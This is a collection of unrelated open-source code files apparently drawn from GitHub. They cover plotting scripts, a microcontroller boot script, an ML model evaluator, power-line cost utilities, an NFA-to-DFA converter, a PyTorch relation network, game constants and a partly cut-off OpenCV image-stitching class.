+{"seq_id":"25082634630","text":"#!/usr/bin/env python\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nif __name__ == '__main__':\n nodes_k20 = [13, 243, 2118, 21128, 75714]\n nodes_k30 = [26, 740, 5028, 46161, 139320]\n print(nodes_k20)\n print(nodes_k30)\n\n fig = plt.figure()\n ax = plt.subplot(111)\n n = len(nodes_k20)\n\n line, = ax.plot(range(10, 60 ,10), nodes_k20, label=\"K = 20\")\n line, = ax.plot(range(10, 60 ,10), nodes_k30, label=\"K = 30\")\n\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.05),\n ncol=3, fancybox=True, shadow=True)\n plt.xlabel('Number of instances (node)')\n plt.ylabel('Training running time (s)')\n plt.show()","repo_name":"Tuanlase02874/Facility-Location-Optimization","sub_path":"visualization/visual_estimate_time.py","file_name":"visual_estimate_time.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28285827448","text":"import pycom\r\nfrom machine import UART\r\nfrom network import WLAN, Bluetooth\r\n\r\nuart = UART(0, 115200)\r\nos.dupterm(uart)\r\n\r\n# Disable WiFI\r\nwlan = WLAN()\r\nwlan.deinit()\r\n\r\n# Disable BT\r\nbt = Bluetooth()\r\nbt.deinit()\r\n\r\n# Disable heartbeat and turn off LED\r\npycom.heartbeat(False)\r\npycom.rgbled(0)\r\n","repo_name":"JoF39/archive","sub_path":"pycom/lopy-ph-sensor/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1983217273","text":"import argparse\nimport importlib\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import Any as NDArray\nfrom typing import Tuple, Union\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom src.utils.argparser import create_modelevaluator_parser\nfrom src.utils.io import get_downstream_dir, get_upstream_dir\nfrom src.utils.types import SampleType\n\n_logger = logging.getLogger(__name__)\n_handler = logging.StreamHandler()\n_handler.setStream(tqdm)\n_logger.addHandler(_handler)\n\n\nclass Evaluator:\n _model = None\n _BATCH_SIZE = 128\n\n def __init__(\n self,\n evaluator_module: str,\n model_path: Union[Path, None] = None,\n input_path: Path = get_upstream_dir(),\n output_path: Path = get_downstream_dir(),\n ):\n self._evaluator_module = evaluator_module\n if model_path is None:\n model_path = input_path.joinpath(\"model\")\n self._model_path = model_path\n self._input_path = input_path\n self._output_path = output_path\n\n def load_model(self):\n self._model = tf.keras.models.load_model(self._model_path)\n\n def load_dataset(\n self, sample_type: SampleType\n ) -> Union[Tuple[tf_data.Dataset, tf_data.Dataset, NDArray], None]:\n filename = sample_type.value + \"_X.npz\"\n path = Path(self._input_path).joinpath(filename)\n if not path.exists():\n return None\n X = np.load(path.as_posix(), allow_pickle=True)\n\n filename = sample_type.value + \"_Y.npz\"\n path = Path(self._input_path).joinpath(filename)\n if not path.exists():\n return None\n Y = np.load(path.as_posix(), allow_pickle=True)\n\n filename = sample_type.value + \"_Z.npz\"\n path = Path(self._input_path).joinpath(filename)\n if path.exists():\n Z = np.load(path.as_posix(), allow_pickle=True)\n else:\n Z = None\n\n X = self._npzfile_to_tf(X)\n Y = self._npzfile_to_tf(Y)\n if Z is not None:\n Z = self._npzfile_to_numpy(Z)\n return X, Y, Z\n\n @staticmethod\n def _npzfile_to_tf(X) -> tf_data.Dataset:\n X = tuple(tf.constant(X[arr]) for arr in X.files)\n X = tf_data.Dataset.from_tensor_slices(X)\n return X\n\n @staticmethod\n def _npzfile_to_numpy(X) -> NDArray:\n X = tuple(X[arr] for arr in X.files)\n return X\n\n def evaluate(\n self,\n sample_type: SampleType,\n X: tf_data.Dataset,\n Y: tf_data.Dataset,\n Z: NDArray = None,\n **kwargs,\n ) -> None:\n evaluator_module = importlib.import_module(\n self._evaluator_module, \"src.modelevaluator\"\n )\n evaluator_module.evaluate(\n model=self._model,\n X=X,\n Y=Y,\n Z=Z,\n output_path=self._output_path.joinpath(sample_type.value),\n **kwargs,\n )\n\n\ndef main():\n modelevaluator_parser = create_modelevaluator_parser()\n parser = argparse.ArgumentParser(parents=[modelevaluator_parser])\n args = parser.parse_args()\n\n _logger.info(\"start Evaluator\")\n evaluator = Evaluator(args.evaluator_module)\n _logger.info(\"start Loading model\")\n evaluator.load_model()\n for sample_type in SampleType.get_list():\n _logger.info(f\"{sample_type} evaluator: start Loading data\")\n dataset = evaluator.load_dataset(sample_type)\n if dataset is not None:\n _logger.info(f\"{sample_type} evaluator: start Evaluating\")\n evaluator.evaluate(\n sample_type, *dataset, **json.loads(args.evaluator_params)\n )\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n main()\n","repo_name":"mzk622/BERT-for-PAS","sub_path":"src/modelevaluator/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36617782295","text":"import numpy as np\ntry:\n from skimage.segmentation import watershed\n from skimage import filters\nexcept ModuleNotFoundError:\n pass\nfrom power_planner.utils.utils import (\n bresenham_line, discrete_angle_costs, angle\n)\n\n\nclass CostUtils():\n\n @staticmethod\n def get_seeds(greater_zero, factor):\n \"\"\"\n Get seeds in grid of every factor pixel\n Arguments:\n greater_zero: binary image indicating where seeds are to be placed\n factor: every factor pixel is a seed\n Returns:\n Array of same shape as greater zero with grid of evenly spaced\n values ranging from 1 to number of seeds\n \"\"\"\n lab = 0\n x_len, y_len = greater_zero.shape\n seeds = np.zeros(greater_zero.shape)\n omitted = 0\n # consider every factor pixel in each dimension\n for i in np.arange(0, x_len, factor):\n for j in np.arange(0, y_len, factor):\n if greater_zero[i, j]:\n # set seed with new index\n seeds[i, j] = lab\n lab += 1\n else:\n omitted += 1\n print(\"omitted:\", omitted)\n return seeds\n\n @staticmethod\n def watershed_transform(cost_rest, factor, compact=0.01, func=\"mean\"):\n \"\"\"\n :param mode: all = all combinations in one cluster possible\n --> leading to larger distances\n center = only the center of each cluster can be connected\n \"\"\"\n pool_func = eval(\"np.\" + func)\n # take mean image for clustering TODO: weighted sum?\n img = np.mean(cost_rest, axis=0)\n\n greater_zero = (img > 0).astype(int)\n\n # get edge image\n edges = filters.sobel(img)\n # get regular seeds\n seeds = CostUtils.get_seeds(greater_zero, factor)\n print(\"number seeds: \", np.sum(seeds > 0))\n\n w1 = watershed(edges, seeds, compactness=compact)\n # w1 is full watershed --> labels spread over corridor borders\n # but: label 0 also included --> +1 before corridor\n w1_g_zero = (w1 + 1) * greater_zero\n # labels: 0 is forbidden, 1 etc is watershed labels\n labels = np.unique(w1_g_zero)\n\n new_cost_rest = np.zeros(cost_rest.shape)\n # iterate over labels (except for 0 - forbidden)\n for _, lab in enumerate(labels[1:]):\n x_inds, y_inds = np.where(w1_g_zero == lab)\n for j in range(len(cost_rest)):\n new_cost_rest[j, int(np.mean(x_inds)),\n int(np.mean(y_inds))] = pool_func(\n cost_rest[j, x_inds, y_inds]\n )\n return new_cost_rest\n\n @staticmethod\n def simple_downsample(img, factor, func=\"mean\"):\n \"\"\"\n Summarize pixels into on with a certain function\n Arguments:\n img: input 3d Array of costs (first dim: cost classes)\n factor: how many pixels to summarize\n func: pooling function - can be any such as\n np.mean np.min or np.max\n Returns:\n image that is zero everywhere except for the selected points\n \"\"\"\n x_len_new = img.shape[1] // factor\n y_len_new = img.shape[2] // factor\n new_img = np.zeros(img.shape)\n pool_func = eval(\"np.\" + func)\n for i in range(x_len_new):\n for j in range(y_len_new):\n patch = img[:, i * factor:(i + 1) * factor, j *\n factor:(j + 1) * factor]\n if np.any(patch):\n for k in range(len(new_img)):\n part = patch[k]\n if np.any(part):\n new_img[k, i * factor, j *\n factor] = pool_func(part[part > 0])\n return new_img\n\n @staticmethod\n def downsample(img, factor, mode=\"simple\", func=\"mean\", compact=0.01):\n if mode == \"simple\":\n return CostUtils.simple_downsample(img, factor, func=func)\n elif mode == \"watershed\":\n return CostUtils.watershed_transform(img, factor, compact=compact)\n else:\n raise NotImplementedError\n\n @staticmethod\n def inf_downsample(img, factor, func=\"mean\"):\n x_len_new = img.shape[1] // factor\n y_len_new = img.shape[2] // factor\n new_img = np.zeros(img.shape)\n new_img += np.inf\n pool_func = eval(\"np.\" + func)\n for i in range(x_len_new):\n for j in range(y_len_new):\n patch = img[:, i * factor:(i + 1) * factor, j *\n factor:(j + 1) * factor]\n if np.any(patch < np.inf):\n for k in range(len(new_img)):\n part = patch[k]\n new_img[k, i * factor, j *\n factor] = pool_func(part[part < np.inf])\n return new_img\n\n @staticmethod\n def compute_edge_costs(path, instance):\n e_costs = []\n for p in range(len(path) - 1):\n point_list = bresenham_line(\n path[p][0], path[p][1], path[p + 1][0], path[p + 1][1]\n )\n e_costs.append(\n np.mean([instance[i, j] for (i, j) in point_list[1:-1]])\n )\n # to make it the same size as other costs\n e_costs.append(0)\n return e_costs\n\n @staticmethod\n def compute_angle_costs(path, angle_norm_factor=np.pi / 2):\n path = np.asarray(path)\n ang_out = [0]\n for p in range(len(path) - 2):\n vec1 = path[p + 1] - path[p]\n vec2 = path[p + 2] - path[p + 1]\n ang_out.append(\n discrete_angle_costs(angle(vec1, vec2), angle_norm_factor)\n )\n ang_out.append(0)\n\n return ang_out\n\n @staticmethod\n def compute_raw_angles(path):\n path = np.asarray(path)\n ang_out = [0]\n for p in range(len(path) - 2):\n vec1 = path[p + 1] - path[p]\n vec2 = path[p + 2] - path[p + 1]\n ang_out.append(angle(vec1, vec2))\n ang_out.append(0)\n return ang_out\n\n @staticmethod\n def emergency_points(hard_cons, costs, max_dist, start_inds, dest_inds):\n \"\"\"\n Add points in regular spacing in forbidden areas\n \"\"\"\n hard_cons[start_inds[0], start_inds[1]] = 1\n hard_cons[dest_inds[0], dest_inds[1]] = 1\n # add grid of emergency points\n w, h = hard_cons.shape\n print(w, max_dist)\n w_inds = np.arange(0, w, max_dist)\n print(w_inds)\n w_inds = w_inds.astype(int)\n h_inds = np.arange(0, h, max_dist).astype(int)\n print(w_inds)\n max_cost = np.max(costs)\n for row in w_inds:\n hard_cons[row, h_inds] = 1\n costs[row, h_inds] = max_cost\n return hard_cons, costs\n","repo_name":"NinaWie/PowerPlanner","sub_path":"power_planner/utils/utils_costs.py","file_name":"utils_costs.py","file_ext":"py","file_size_in_byte":6913,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9596549383","text":"#!/usr/bin/env python3.7\n# -*- coding: utf8 -*-\n\nimport matplotlib as mat\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nsns.set(rc={\"figure.figsize\":(8,4)})\nsns.set_context('paper',font_scale=1.5,rc={'lines.linewidth':1.5})\nsns.set_style('ticks')\nmat.rc('text',usetex=True)\nmat.rc('text.latex',preamble=r'\\usepackage[utf8]{inputenc}\\usepackage[T1]{fontenc}\\usepackage[spanish]{babel}\\usepackage{mathpazo}\\usepackage[euler-digits,euler-hat-accent]{eulervm}\\usepackage{amsmath,amsfonts,amssymb}\\usepackage{siunitx}')\n\na=np.arange(0,89)\nadist=np.loadtxt('angular-dist.dat',delimiter=' ',comments='#')\nfig,ax=plt.subplots(nrows=1,ncols=1,sharex=False,sharey=False)\nax.plot(a,adist[0,:]/np.sin(np.radians(a)),ds='steps-mid')\nplt.show()\n","repo_name":"anzorenam/tesis","sub_path":"images/angular-dist.py","file_name":"angular-dist.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73984003368","text":"from classes import AFN\nfrom classes import AFD\n\nEpslon = 'ε'\n\n_EstadosConcluidos = [] # Ex: ['E1', 'E2', 'E1,E2']\n\ndef addEstadoConcluido(estado):\n _EstadosConcluidos.append(estado)\n\ndef ehEstadoConcluido(estado):\n return estado in _EstadosConcluidos\n\n\ndef afnToAFD(afn):\n\n delta_afd = {}\n delta = afn.getDelta()\n\n #valida as transicoes (Remove transicoes de uma palavra para multiplos destinos)\n for estado in delta.keys():\n\n delta_afd_aux = validarTransicoes(delta, estado)\n delta_afd.update(delta_afd_aux)\n\n #Verificar determinismo\n delta_afd = verificaDeterminismo(delta_afd)\n\n\n estados_iniciais_afn = afn.getEstadosIniciais()\n estados_iniciais_afd = verificaSubEstados(delta_afd, estados_iniciais_afn)\n\n estados_finais_afn = afn.getEstadosFinais()\n estados_finais_afd = verificaSubEstados(delta_afd, estados_finais_afn)\n\n\n afd = AFD(delta_afd, estados_iniciais_afd, estados_finais_afd)\n\n return afd\n\ndef getPalavra(transicao):\n return transicao[0]\n\ndef getDestino(transicao):\n return transicao[1]\n\n# Verifica transforma multiplas transicoes em uma transicao com um grupo de estados\ndef validarTransicoes(delta, estados):\n\n estados_destinos = {} # { palavra : [estados] }\n transicoes = []\n delta_aux = {} # { estado : [palavra, destino]] }\n\n if type(estados) == list:\n # cria nomenclatura do novo estado\n estados = sorted(estados)\n novo_estado = ','.join(estados)\n\n else:\n novo_estado = estados\n estados = [estados]\n\n #Sai caso o estado já tenha sido concluido\n if ehEstadoConcluido(novo_estado):\n return {}\n else:\n addEstadoConcluido(novo_estado)\n\n #pega todas as transicoes possiveis\n for estado in estados:\n transicoes.extend(delta[estado])\n\n # Verifica estados destinos por palavra\n for transicao in transicoes:\n palavra = getPalavra(transicao)\n\n # Adiciona destino ao dicionario de estados destinos\n if palavra in estados_destinos.keys():\n if not getDestino(transicao) in estados_destinos[palavra]:\n estados_destinos[palavra] += [getDestino(transicao)]\n\n # Adiciona palavra nova ao dicionario de possibilidades\n else:\n estados_destinos[palavra] = [getDestino(transicao)]\n\n #cria afd com dados obtidos\n delta_aux[novo_estado] = []\n for palavra in estados_destinos.keys():\n estado_destino = ','.join(estados_destinos[palavra])\n delta_aux[novo_estado] += [(palavra, estado_destino)]\n\n for palavra in estados_destinos.keys():\n delta_aux.update(validarTransicoes(delta, estados_destinos[palavra]))\n\n return delta_aux\n\ndef pegaPalavrasAFD(afd):\n palavras = []\n for estado in afd.keys():\n for transicao in afd[estado]:\n palavra = getPalavra(transicao)\n if not palavra in palavras:\n palavras.append(palavra)\n\n return palavras\n\ndef verificaDeterminismo(delta):\n palavras = pegaPalavrasAFD(delta)\n estados = delta.keys()\n\n #determina estado buraco\n estado_id = 0\n estado_buraco = 'E' + str(estado_id)\n while estado_buraco in estados:\n estado_id += 1\n estado_buraco = 'E' + str(estado_id)\n\n buraco_usado = False\n for estado in estados:\n\n #verifica qual palavra esta faltando\n palavras_faltando = palavras.copy()\n for transicao in delta[estado]:\n palavra_atual = getPalavra(transicao)\n if palavra_atual in palavras_faltando:\n palavras_faltando.remove(palavra_atual)\n\n\n for palavra in palavras_faltando:\n delta[estado].append((palavra, estado_buraco))\n buraco_usado = True\n\n if buraco_usado:\n delta[estado_buraco] = []\n for palavra in palavras:\n delta[estado_buraco].append((palavra, estado_buraco))\n\n\n return delta\n\ndef verificaSubEstados(delta, estados):\n for estado in delta.keys():\n if estado in estados:\n continue\n\n sub_estados = estado.split(',')\n pertence = any(estado in sub_estados for estado in estados)\n if pertence:\n estados.append(estado)\n\n return estados\n\n#delta = {'E1': [('a', 'E3'), ('a', 'E6'), ('a', 'E7'), ('b', 'E5'), ('b', 'E6'), ('b', 'E7')], 'E2': [('a', 'E3'), ('a', 'E6'), ('a', 'E7')], 'E3': [('c', 'E8'), ('c', 'E9')], 'E4': [('b', 'E5'), ('b', 'E6'), ('b', 'E7')], 'E5': [('c', 'E8'), ('c', 'E9')], 'E6': [('c', 'E8'), ('c', 'E9')], 'E7': [('c', 'E8'), ('c', 'E9')], 'E8': [], 'E9': []}\n#estados_iniciais = ['E1']\n#estados_finais = ['E9']\n#exemplo_afn = AFN(delta, estados_iniciais, estados_finais)\n#afnToAFD(exemplo_afn)\n","repo_name":"compilers-uff/expressoes-regulares-victorguarana","sub_path":"afnToAFD.py","file_name":"afnToAFD.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13751345947","text":"import numpy as np\nimport itertools\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn.modules.module import Module\n\n\nclass CRN(Module):\n def __init__(self, module_dim, num_objects, max_subset_size, gating=False, spl_resolution=1):\n super(CRN, self).__init__()\n self.module_dim = module_dim\n self.gating = gating\n\n self.k_objects_fusion = nn.ModuleList()\n if self.gating:\n self.gate_k_objects_fusion = nn.ModuleList()\n for i in range(min(num_objects, max_subset_size + 1), 1, -1):\n self.k_objects_fusion.append(nn.Linear(2 * module_dim, module_dim))\n if self.gating:\n self.gate_k_objects_fusion.append(nn.Linear(2 * module_dim, module_dim))\n self.spl_resolution = spl_resolution\n self.activation = nn.ELU()\n self.max_subset_size = max_subset_size\n\n def forward(self, object_list, cond_feat):\n \"\"\"\n :param object_list: list of tensors or vectors\n :param cond_feat: conditioning feature\n :return: list of output objects\n \"\"\"\n scales = [i for i in range(len(object_list), 1, -1)]\n\n relations_scales = []\n subsample_scales = []\n for scale in scales:\n relations_scale = self.relationset(len(object_list), scale)\n relations_scales.append(relations_scale)\n subsample_scales.append(min(self.spl_resolution, len(relations_scale)))\n\n crn_feats = []\n if len(scales) > 1 and self.max_subset_size == len(object_list):\n start_scale = 1\n else:\n start_scale = 0\n for scaleID in range(start_scale, min(len(scales), self.max_subset_size)):\n idx_relations_randomsample = np.random.choice(len(relations_scales[scaleID]),\n subsample_scales[scaleID], replace=False)\n mono_scale_features = 0\n for id_choice, idx in enumerate(idx_relations_randomsample):\n clipFeatList = [object_list[obj].unsqueeze(1) for obj in relations_scales[scaleID][idx]]\n # g_theta\n g_feat = torch.cat(clipFeatList, dim=1)\n g_feat = g_feat.mean(1)\n if len(g_feat.size()) == 2:\n h_feat = torch.cat((g_feat, cond_feat), dim=-1)\n elif len(g_feat.size()) == 3:\n cond_feat_repeat = cond_feat.repeat(1, g_feat.size(1), 1)\n h_feat = torch.cat((g_feat, cond_feat_repeat), dim=-1)\n if self.gating:\n h_feat = self.activation(self.k_objects_fusion[scaleID](h_feat)) * torch.sigmoid(\n self.gate_k_objects_fusion[scaleID](h_feat))\n else:\n h_feat = self.activation(self.k_objects_fusion[scaleID](h_feat))\n mono_scale_features += h_feat\n crn_feats.append(mono_scale_features / len(idx_relations_randomsample))\n return crn_feats\n\n def relationset(self, num_objects, num_object_relation):\n return list(itertools.combinations([i for i in range(num_objects)], num_object_relation))\n","repo_name":"thaolmk54/hcrn-videoqa","sub_path":"model/CRN.py","file_name":"CRN.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"30500975203","text":"WINDOW_WIDTH = 350\nWINDOW_HEIGHT = 650\n\nBLACK_COLOR = (0, 0, 0)\nWHITE_COLOR = (255, 255, 255)\n\nBIRD_PATH = 'photos/bird.JPG'\nBIRD_WIDTH = 30\nBIRD_HEIGHT = 30\nBIRD_START_POS_X = 170\nBIRD_START_POS_Y = 320\nBIRD_SPEED_X = 4\n\nACCELERATION_SIZE = 0.3\nJUMP_SPEED = -7\n\nSTART_TEXT = 'Press space to play!'\nSTART_TEXT_FONT = 'Ariel'\nSTART_TEXT_SIZE = 30\nSTART_TEXT_POS_X = 70\nSTART_TEXT_POS_Y = 50\n\nEND_TEXT = 'Better luck next time!'\nEND_TEXT_FONT = 'Ariel'\nEND_TEXT_SIZE = 30\nEND_TEXT_POS_X = 70\nEND_TEXT_POS_Y = 50\n\nSCORE_TEXT = 'SCORE: '\nSCORE_TEXT_FONT = 'Ariel'\nSCORE_TEXT_SIZE = 30\nSCORE_TEXT_POS_X = 120\nSCORE_TEXT_POS_Y = 90\n\nSPIKE_PATH = 'photos/spike.JPG'\nSPIKE_WIDTH = 40\nSPIKE_HEIGHT = 10\nSPIKES_NUM = 3\n\nSCORE_ADDITION = SPIKES_NUM\n\nBEST_SCORE_FILE_PATH = 'files/best_score.txt'\nBEST_SCORE_TEXT = 'BEST SCORE: '\nBEST_SCORE_TEXT_FONT = 'Ariel'\nBEST_SCORE_TEXT_SIZE = 20\nBEST_SCORE_TEXT_POS_X = 120\nBEST_SCORE_TEXT_POS_Y = 600\n\nBONUS_PATH = 'photos/bonus.JPG'\nBONUS_WIDTH = 20\nBONUS_HEIGHT = 20\nBONUS_ADDITION = 10\n","repo_name":"adirb151/BirdyGame","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34739449447","text":"#!/usr/bin/env python\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom liegroups.numpy import SE3\nfrom scipy.optimize import least_squares\n\nfrom .types import Array, Plane\n\ntry:\n from typing import Literal # type: ignore\nexcept ImportError:\n from typing_extensions import Literal\n\n__all__ = [\"optimize\"]\n\n\ndef _optimize_func(\n pose_se3, points: Array[Tuple[int, Literal[3]], float], plane_coefficients: Array[Tuple[int, Literal[4]], float]\n) -> Array[Tuple[int], float]:\n transformed_points = SE3.exp(pose_se3).dot(points)\n return (np.sum(transformed_points * plane_coefficients[:, :3], axis=1) + plane_coefficients[:, 3]) * (\n plane_coefficients[:, 4] ** -1\n )\n\n\ndef optimize(\n all_planes_lidar: List[Plane],\n all_planes_camera: List[Plane],\n):\n assert len(all_planes_lidar) == len(all_planes_camera)\n\n initial_transformation_mat = _direct_linear_optimize(all_planes_lidar, all_planes_camera)\n\n initial_pose_SE3 = SE3.from_matrix(initial_transformation_mat, normalize=True)\n initial_guess_se3 = initial_pose_SE3.log()\n plane_coefficients, points = _prepare_data(all_planes_lidar, all_planes_camera)\n\n res_lsq = least_squares(_optimize_func, initial_guess_se3, args=(points, plane_coefficients), loss=\"cauchy\")\n\n return SE3.exp(res_lsq.x)\n\n\ndef _direct_linear_optimize(\n all_planes_lidar: List[Plane],\n all_planes_camera: List[Plane],\n):\n\n Rcl = _direct_linear_optimize_rot(all_planes_lidar, all_planes_camera)\n trans = _direct_linear_optimize_trans(all_planes_lidar, all_planes_camera, Rcl)\n transformation_mat = np.eye(4)\n transformation_mat[:3, :3] = Rcl\n transformation_mat[:3, 3] = trans.squeeze()\n\n return transformation_mat\n\n\ndef _prepare_data(all_planes_lidar: List[Plane], all_planes_camera: List[Plane]):\n num_pairs = len(all_planes_lidar)\n num_points = 0\n for i in np.arange(num_pairs):\n num_points += len(all_planes_lidar[i].projections)\n\n planes_camera_coefficients = np.zeros((num_points, 5))\n all_lidar_points = np.zeros((num_points, 3))\n\n count = 0\n for i in np.arange(num_pairs):\n cur_num_points = len(all_planes_lidar[i].projections)\n all_lidar_points[count : count + cur_num_points, :] = all_planes_lidar[i].projections\n planes_camera_coefficients[count : count + cur_num_points, :4] = np.tile(\n all_planes_camera[i].coefficients, cur_num_points\n ).reshape(-1, 4)\n planes_camera_coefficients[count : count + cur_num_points, 4] = np.ones(cur_num_points) * cur_num_points\n count += cur_num_points\n\n return planes_camera_coefficients, all_lidar_points\n\n\ndef _direct_linear_optimize_rot(\n all_planes_lidar: List[Plane], all_planes_camera: List[Plane]\n) -> Array[Tuple[Literal[3], Literal[3]], float]:\n num_pairs = len(all_planes_lidar)\n all_planes_lidar_normals = np.zeros((num_pairs * 2, 3), dtype=np.float64)\n all_planes_camera_normals = np.zeros_like(all_planes_lidar_normals)\n for i in np.arange(num_pairs):\n all_planes_lidar_normals[i] = all_planes_lidar[i].coefficients[:3]\n all_planes_camera_normals[i] = all_planes_camera[i].coefficients[:3]\n\n H = all_planes_lidar_normals.T @ all_planes_camera_normals\n u, s, vh = np.linalg.svd(H)\n Rcl = vh.T @ u.T\n\n return Rcl\n\n\ndef _direct_linear_optimize_trans(\n all_planes_lidar: List[Plane],\n all_planes_camera: List[Plane],\n Rcl: Array[Tuple[Literal[3], Literal[3]], float],\n):\n planes_camera_coefficients, all_lidar_points = _prepare_data(all_planes_lidar, all_planes_camera)\n\n A = planes_camera_coefficients[:, :3]\n rot_points = Rcl @ all_lidar_points.T\n rot_points = rot_points.T\n b = np.sum(planes_camera_coefficients[:, :3] * rot_points, axis=1) + planes_camera_coefficients[:, 3]\n b *= -1\n result = np.linalg.lstsq(A, b.reshape(-1, 1), rcond=None)\n trans = result[0]\n\n return trans\n","repo_name":"xmba15/lidar_camera_calibration_point_to_plane","sub_path":"lidar_camera_calibration/point_to_plane_optimization.py","file_name":"point_to_plane_optimization.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"33189245597","text":"import abc\nfrom typing import Optional\n\nfrom app.domain.users.entities import SessionUser, User\nfrom .entities import LoginInputDTO, TokenDataDTO\n\n\nclass AuthServiceInterface(metaclass=abc.ABCMeta):\n \"\"\"test comment\"\"\"\n\n @abc.abstractmethod\n async def authenticate_user(self, input: LoginInputDTO) -> TokenDataDTO:\n \"\"\"authenticate user via email and password and return auth token\"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_token(self, user: User) -> str:\n \"\"\"return token data for user\"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_session_user_from_token(self, request) -> Optional[SessionUser]:\n \"\"\"return SessionUser from request\"\"\"\n raise NotImplementedError\n","repo_name":"tbleicher/clean-architecture-python","sub_path":"src/app/domain/auth/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41444293382","text":"import numpy as np\nimport cv2\nsift = cv2.xfeatures2d.SIFT_create() # Calling the SIFT algorithm\n\n#IMAGES ALREADY NEED TO A COMBINED FORM OF THE TWO IMAGES\nclass Stitcher:\n# def __init__(self):\n# self.isv3 = imutils.is_cv3()\n #Checks which CV version being used as large differencesthe different versions\n \n # unpack the images, then detect keypoints and extract\n\t # local invariant descriptors from them\n #images is list of (two) images that we are going to stitch together to form the panorama\n #reprojThresh which is the maximum pixel “wiggle room” allowed by the RANSAC algorithm like deadband\n def stitch(self,images,ratio=0.75,reprojThresh=10,showMatches=False):\n (image_left,image_right)=images\n (X_left,Y_left)=self.detectAndDescribe(image_left)\n (X_right,Y_right)=self.detectAndDescribe(image_right)\n #The ordering to the images list is important: we expect images to be supplied in left-to-right order.\n #Match features of the two images\n #OR GEBERATE A CRITICAL VALUE FOR M TO FIND THE BEST IMAGE QUALITY\n for i in range(10):\n M=self.matchKeypoints(X_left,X_right,Y_left,Y_right)\n if M is None:\n print(\"Not Enough matching points found\")\n # MATCHES gives a list of keypoint not necessarily matched\n # STATUS a list of indexes to indicate which keypoints in matches were successfully spatially verified using RANSAC.\n (matches, H, status) = M\n # Shape out of the output image is the sum of the lengths of both images and then using the height of the second image\n result = cv2.warpPerspective(image_left, H,(image_left.shape[1] + image_right.shape[1], image_left.shape[0]))\n # HERE image_left variable defines the right image \n result[0:image_right.shape[0], 0:image_right.shape[1]] = image_right\n \n# check to see if the keypoint matches should be visualiz\n if showMatches:\n vis = self.drawMatches(image_left, image_right, X_left, X_right, matches,status)\n return (result,vis)\n return result #This is waht the function returns\n \n# Method accepts an image, then detects keypoints and extracts local invariant descriptors\n def detectAndDescribe(self, image):\n # detect and extract features from the image\n descriptor = cv2.xfeatures2d.SIFT_create()\n (kps, features) = descriptor.detectAndCompute(image, None)\n # convert the keypoints from KeyPoint objects to NumPy arrays\n kps = np.float32([kp.pt for kp in kps])\n return (kps, features)\n \n def matchKeypoints(self,X_left,X_right,Y_left,Y_right,ratio=0.75,reprojThresh=10):\n # compute the raw matches and initialize the list of actual# matches\n matcher = cv2.DescriptorMatcher_create(\"BruteForce\")\n #performs k-NN matching between the two feature vector sets using k=2 \n #(indicating the top two matches for each feature vector are returned)\n #The reason we want the top two matches rather than just the top one match is because \n #we need to apply David Lowe’s ratio test for false-positive match pruning\n rawMatches = matcher.knnMatch(Y_left, Y_right, 2)\n matches=[]\n #loop over the matches\n for m in rawMatches:\n # ensure the distance is within a certain ratio of each# other\n #Lowe’s ratio test, which is used to determine high-quality feature matches. \n #Typical values for Lowe’s ratio are normally in the range [0.7, 0.8].\n if len(m) == 2 and m[0].distance < m[1].distance * ratio:\n matches.append((m[0].trainIdx, m[0].queryIdx))\n \n # Computing a homography between two sets of points requires at a bare minimum\n # an initial set of four matches. For a more reliable homography estimation, \n # we should have substantially more than just four matched points\n if len(matches)>4:\n # construct the two sets of points\n ptsA = np.float32([X_left[i] for (_, i) in matches])\n ptsB = np.float32([X_right[i] for (i, _) in matches])\n \n # compute the homography between the two sets of points\n (H, status) = cv2.findHomography(ptsA, ptsB, cv2.RANSAC,reprojThresh)\n # return the matches along with the homograpy matrix and status of each matched point\n return (matches, H, status)\n #Used to visualize keypoint correspondences between two images:\n def drawMatches(self, image_left, image_right, X_left, X_right, matches, status):\n # initialize the output visualization image\n (hA, wA) = image_left.shape[:2]\n (hB, wB) = image_right.shape[:2]\n vis = np.zeros((max(hA, hB), wA + wB, 3), dtype=\"uint8\")\n vis[0:hA, 0:wA] = image_left\n vis[0:hB, wA:] = image_right\n\n # loop over the matches\n for ((trainIdx, queryIdx), s) in zip(matches, status):\n if s == 1:\n ptA = (int(X_left[queryIdx][0]), int(X_left[queryIdx][1]))\n ptB = (int(X_right[trainIdx][0]) + wA, int(X_right[trainIdx][1]))\n cv2.line(vis, ptA, ptB, (0, 255, 0), 1)\n return 